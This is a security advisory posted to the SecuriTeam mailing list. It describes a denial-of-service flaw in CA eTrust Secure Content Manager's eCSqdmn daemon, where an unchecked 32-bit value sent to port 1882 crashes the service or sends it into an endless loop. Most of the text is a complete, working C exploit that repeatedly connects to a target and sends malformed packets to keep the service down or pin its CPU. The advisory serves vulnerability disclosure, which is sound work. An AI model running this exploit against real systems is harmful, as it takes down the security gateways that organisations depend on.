The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
eTrust Secure Content Manager Denial of Service
------------------------------------------------------------------------
SUMMARY
<http://www.ca.com/us/products/product.aspx?id=4673> CA SCM "is a gateway
product that secures, monitors, filters and blocks potential threats from
messaging and Web traffic. It protects you against viruses, spam,
phishing, P2P file sharing, malicious mobile code and prevents access to
known spyware sites." A denial of service vulnerability in eTrust's Secure
Content Manager (SCM) allows remote attackers to cause the product to
crash by sending it malformed data.
DETAILS
Vulnerable Systems:
* CA eCSqdmn version 8.0.28000.511
The eTrust Common Services (Transport) Daemon (eCSqdmn) listening on port
1882 is affected by a vulnerability caused by an unchecked 32 bit number
passed by the client which is used to advance on the next data block.
The effects resulting by the usage of a malformed value are the crashing
of the service, which will be automatically restarted after
some seconds so the attacker needs to keep it down at regular intervals,
or CPU at 100% caused by an endless loop in the continuous handling of the
same data.
Exploit:
/*
by Luigi Auriemma - http://aluigi.org/poc/ecsqdamn.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define PORT 1882
#define BUFFSZ 256
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int sec);
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
attack,
first = 1;
u16 port = PORT;
u8 buff[BUFFSZ],
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"eTrust Secure Content Manager (eCSqdmn) <= 8.0.28000.511 Denial
of Service "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attacks:\n"
" 1 = invalid memory access in eCSqdmn (will be kept down
continuosly)\n"
" 2 = endless loop in eCSqdmn\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port));
for(;;) {
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
if(first) std_err();
printf("- retry connection\n");
sleep(ONESEC);
continue;
}
if(first) {
if(attack == 1) printf("- start attack for keeping the process
down\n");
first = 0;
}
p = buff;
p += putxx(p, 0x0101, 16);
p += putxx(p, 0, 8);
p += putxx(p, 1, 8);
p += putxx(p, 1 + 4, 32);
p += putxx(p, 0, 32);
printf("- send header\n");
send(sd, buff, p - buff, 0);
p = buff;
p += putxx(p, 1, 8);
if(attack == 1) {
p += putxx(p, 99999999, 32);
} else {
p += putxx(p, -5, 32);
}
printf("- send data\n");
send(sd, buff, p - buff, 0);
while(!timeout(sd, 3)) {
len = recv(sd, buff, BUFFSZ, 0);
if(len <= 0) break;
}
close(sd);
if(attack == 2) break;
}
printf("- done\n");
return(0);
}
int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
}
return(bytes);
}
int timeout(int sock, int sec) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = sec;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/ecsqdamn-adv.txt>
http://aluigi.altervista.org/adv/ecsqdamn-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
